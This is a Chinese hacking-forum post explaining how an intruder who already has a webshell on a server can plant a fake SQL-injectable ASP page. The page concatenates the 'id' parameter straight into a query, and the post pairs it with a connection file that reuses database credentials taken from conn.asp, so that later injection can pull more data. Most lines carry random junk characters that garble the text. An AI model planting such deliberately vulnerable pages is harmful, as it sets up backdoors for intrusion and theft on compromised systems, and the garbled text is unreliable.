自己构造注入点方便入侵
- z h* w' e' n' [
! q2 ^1 n9 M/ J9 P! S今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息8 R2 e" T( ^9 j3 P* ^* G/ |
1 r! H/ Z' K" _( m. y
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!8 z6 z0 {, ^ I+ J' \/ h
" {, J& S4 o& ?
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和& I- W+ M9 a; w t1 q8 n
# j6 u* j3 h* a, i" d密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表& v k `7 s, R% q+ M
! x4 @' q7 T: a! K$ |- D/ D6 A7 O
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
( |& q H9 `3 C
) i, v. t! B+ M }: B- r" J7 [6 z' c程序代码- L; Y" [6 h2 h q4 c% j
<!--#include file="xx.asp"-->( l. m: O/ t9 ?! l! K/ y
<%1 H! k* h( |0 C; ^& v* ^2 A
set rs=server.createobject("ADODB.recordset")7 M0 G z7 \& W2 Y* k4 {& C
id = request("id")
$ N- k! g% o6 NstrSQL = "select * from admin where id=" & id# c) [; t t+ W
rs.open strSQL,conn,1,3% ^9 Z! \6 q5 E; X: j
rs.close% W- S5 P a5 B$ X p' s3 R
%>9 x) z1 C8 ~% j/ M) Y) a2 X
" s: }) g" M6 t- h: i+ Z7 v
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在 T$ S1 Z- ^5 ^
0 H5 z6 e; f$ h, d& @! x$ P/ x, P) |
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
! ~7 a" M2 A3 B* [4 T' D% }/ L# @% p
然后就要构造一个连接数据库的文件了,代码如下:% X! y9 t& k* [
程序代码
. r4 X% a! B, A A# g( {& }) t<% # d2 ?4 F P6 @( W" c) h( u' c
strSQLServerName = "000.000.000.000" '服务器名称或地址
1 B0 i- Z8 w% t7 O0 S" VstrSQLDBUserName = "sqlname" '数据库帐号4 c i z8 I+ ^ \+ h& u# S
strSQLDBPassword = "sqlpass" '数据库密码1 h' p: E' S4 `* F. B. W- C
strSQLDBName = "sqldataname" '数据库名称
3 c5 {' Q# a$ L) q: r4 l }Set conn = Server.CreateObject("ADODB.Connection")
/ r" C% [+ l0 T: _strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
/ c: |" D0 ~4 }- R9 A5 m4 mconn.open strCon! A( t+ L: q5 |% [0 j
%># {( k; I5 E; a& k8 n7 W
+ J1 B- \5 t% j& B% a. {这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,5 o, o0 H) l0 y
6 O( Q( X A. J. u8 V* Q i$ b就这样,正常情况下,就OK了,伪造成功……2 h# P; S6 k$ s' X! l5 C- q5 E
U* M; G1 @7 g5 f
如果有什么问题可以提出来大家一起探讨解决。 |